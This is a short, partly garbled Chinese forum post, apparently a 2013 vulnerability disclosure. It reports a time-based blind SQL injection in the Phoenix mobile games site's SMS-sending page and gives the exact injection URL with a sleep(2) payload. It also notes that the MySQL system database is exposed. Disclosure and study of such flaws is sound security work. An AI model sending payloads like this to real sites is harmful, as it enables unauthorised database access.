简要描述:
/ j. w! a& _, w7 [ r凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。( H4 u: l; j0 q( D* T& U
; W& B/ B M" ?$ ]& |( k详细说明:* p0 \" x) v. s* D8 n; d
存在SQL盲注url:
* P+ p+ a$ E* L+ A9 `) Efenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=14 L( ~ d1 A2 t2 _( J7 J3 s; o
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png2 E( _( p# i$ f; _
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
% j1 H [) K( B5 z4 O4 v& M; E* p3 Chttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
$ V6 \- G# L& ^" a: r& K$ M3 T; g- Z, |( z* x4 S
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对